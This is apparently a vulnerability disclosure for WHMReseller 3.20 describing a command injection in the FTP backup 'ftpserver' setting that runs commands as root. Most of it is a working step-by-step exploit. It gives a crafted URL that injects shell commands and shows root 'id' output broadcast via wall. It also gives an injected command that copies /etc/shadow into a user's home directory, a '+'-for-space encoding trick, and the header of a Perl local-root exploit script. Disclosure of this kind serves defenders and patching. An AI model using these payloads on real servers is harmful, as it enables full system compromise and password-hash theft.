WHMReseller 3.20 - resellers could execute commands as root



DESCRIPTION


The "ftpserver" variable in the FTP backup settings is not sanitized, so shell metacharacters can be injected into the command line that is executed when the FTP backup is run. Since the backups run as root, the injected commands execute as root.



IMPACT


Full system compromise.


1. As a reseller, access the following URL:

https://example.com:2087/cgi/whmreseller/subreseller.cgi?action=backup&ftpsettings=yes&ftpserver=;/usr/bin/id|/usr/bin/wall;&ftpuser=ftpuser&ftppass=ftppass&end=Save


2. Observe the "ftpserver" variable in your master reseller file, assuming your username is "alice":

[root@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller/mr]# grep -n ftp alice
22:ftpweeklyenabled=0
24:ftpserver=;/usr/bin/id|/usr/bin/wall;
25:ftpuser=ftpuser
26:ftppass=ftppass
27:ftpfiles=


Now we're going to initiate a backup for ourselves. WHMReseller is going to execute the command "/usr/bin/ftp -vu" and pass it the value of the "ftpserver" variable as its argument. Thus, the full command it's going to execute will be:

/usr/bin/ftp -vu ;/usr/bin/id|/usr/bin/wall;


3. To start the backup process, access the following URL:

https://example.com:2087/cgi/whmreseller/subreseller.cgi?action=backup&ftpbackup=alice


Anywhere from a few seconds to a few minutes later, you will see the following in your console:

[user@host ~]$


Broadcast message from root (Mon Aug 25 15:40:09 2008):

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Spaces can be used in the injected command by encoding them as the "+" character, which the CGI decodes to a space. Thus, the following command:

;/bin/cat+/etc/shadow+>+/home/user/shadow;

would be the same as this:

cat /etc/shadow > ~/shadow


[user@host ~]$ head -15 whmreseller_local_root.pl
#!/usr/bin/perl

####################################################
#
#  WHMReseller 3.20
#  WHMReseller 3.211 (still not fixed)
#  WHMReseller 3.212 (still not fixed)
#  WHMReseller 3.214 (still not fixed)
#
#  $ ./whmreseller_local_root.pl
#  ............
#  sh-3.00# id
#  uid=0(root) gid=0(root)
#
####################################################